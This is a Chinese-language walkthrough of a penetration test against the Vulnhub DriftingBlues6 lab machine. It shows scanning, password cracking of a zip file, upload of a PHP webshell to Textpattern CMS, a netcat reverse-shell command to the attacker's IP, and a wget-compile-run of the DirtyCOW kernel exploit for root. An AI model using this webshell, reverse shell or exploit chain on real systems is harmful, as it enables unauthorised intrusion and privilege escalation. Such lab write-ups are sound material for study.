靶机渗透实战-Vulnhub-Driftingblues6

主机发现

1	nmap 222.24.6.0/24

发现IP为222.24.6.219，回显如下：

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:43 CST 
Nmap scan report for 222.24.6.219
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (conn-refused) 
PORT   STATE SERVICE
80/tcp open  http

详细扫一遍端口：

1	nmap -sV -A -p- -T4 222.24.6.219

发现就只有80端口：

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:48 CST
Nmap scan report for 222.24.6.219
Host is up (0.000042s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds

HTTP

扫目录：

1	gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://222.24.6.219/ -x php,txt,html -e

回显：

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://222.24.6.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://222.24.6.219/.html                (Status: 403) [Size: 285]
http://222.24.6.219/index                (Status: 200) [Size: 750]
http://222.24.6.219/.php                 (Status: 403) [Size: 284]
http://222.24.6.219/index.html           (Status: 200) [Size: 750]
http://222.24.6.219/db                   (Status: 200) [Size: 53656]
http://222.24.6.219/robots               (Status: 200) [Size: 110]
http://222.24.6.219/robots.txt           (Status: 200) [Size: 110]
http://222.24.6.219/spammer              (Status: 200) [Size: 179]
http://222.24.6.219/.html                (Status: 403) [Size: 285]
http://222.24.6.219/.php                 (Status: 403) [Size: 284]
http://222.24.6.219/server-status        (Status: 403) [Size: 293]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

发现有robots.txt，找到/textpattern/textpattern/。FUZZ一下.zip文件：

1	wfuzz -u http://222.24.6.219/FUZZ.zip -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --sc 200,301

发现回显：

 /home/monoceros406/.local/lib/python3.11/site-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://222.24.6.219/FUZZ.zip
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                            
=====================================================================

000000001:   200        75 L     75 W       750 Ch      "# directory-list-2.3-medium.txt"                                                                                                                  
000000007:   200        75 L     75 W       750 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                                  
000000003:   200        75 L     75 W       750 Ch      "# Copyright 2007 James Fisher"                                                                                                                    
000000013:   200        75 L     75 W       750 Ch      "#"                                                                                                                                                
000000010:   200        75 L     75 W       750 Ch      "#"                                                                                                                                                
000000012:   200        75 L     75 W       750 Ch      "# on at least 2 different hosts"                                                                                                                  
000000009:   200        75 L     75 W       750 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                                                                              
000000011:   200        75 L     75 W       750 Ch      "# Priority ordered case-sensitive list, where entries were found"                                                                                 
000000006:   200        75 L     75 W       750 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                                    
000000005:   200        75 L     75 W       750 Ch      "# This work is licensed under the Creative Commons"                                                                                               
000000008:   200        75 L     75 W       750 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                                                                       
000000002:   200        75 L     75 W       750 Ch      "#"                                                                                                                                                
000000004:   200        75 L     75 W       750 Ch      "#"                                                                                                                                                
000008517:   200        1 L      9 W        177 Ch      "spammer"                                                                                                                                          

Total time: 0
Processed Requests: 220560
Filtered Requests: 220546
Requests/sec.: 0

下载spammer.zip，尝试爆密码：

1 2	zip2john spammer.zip >hash john --wordlist=/usr/share/wordlists/rockyou.txt hash

发现密码myspace4：

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4         (spammer.zip/creds.txt)     
1g 0:00:00:00 DONE (2024-03-19 17:00) 33.33g/s 2184Kp/s 2184Kc/s 2184KC/s 123456..sabrina7
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

解压后得到creds.txt内容：mayer:lionheart，登录/textpattern/textpattern后台，左下角有字样“Textpattern CMS v4.8.3”。

Textpattern

搜索可用EXP：

1	searchsploit Textpattern

找到回显：

1	TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) \| php/webapps/48943.py

拷贝EXP：

1	cp /usr/share/exploitdb/exploits/php/webapps/48943.py ~

但其实并没有这么多事儿，在Textpattern后台Files模块直接上传PHP一句话木马1.php即可：

1
2
3

<?php
    system(_$GET["cmd"]);
?>

然后访问：

1	http://222.24.6.219/textpattern/files/1.php?cmd=whoami

发现成功回显。在本地建立8989端口的监听：

1	nc -lvvp 8989

弹Shell：

1	http://222.24.6.219/textpattern/files/1.php?cmd=nc%20222.24.6.149%208989%20-e%20%2Fbin%2Fbash

本地连接上，然后加上提示符：

1	script /dev/null -c bash

权限提升

看内核版本：

uname -a

发现回显，可利用脏牛40616.c：

1	Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

本地开个Apacke2服务，在靶机上下载，编译运行：

wget http://222.24.6.149/40616.c
gcc 40616.c -o exp -pthread
chmod +x ./exp
./exp

提权成功。

1	cat /root/flag.txt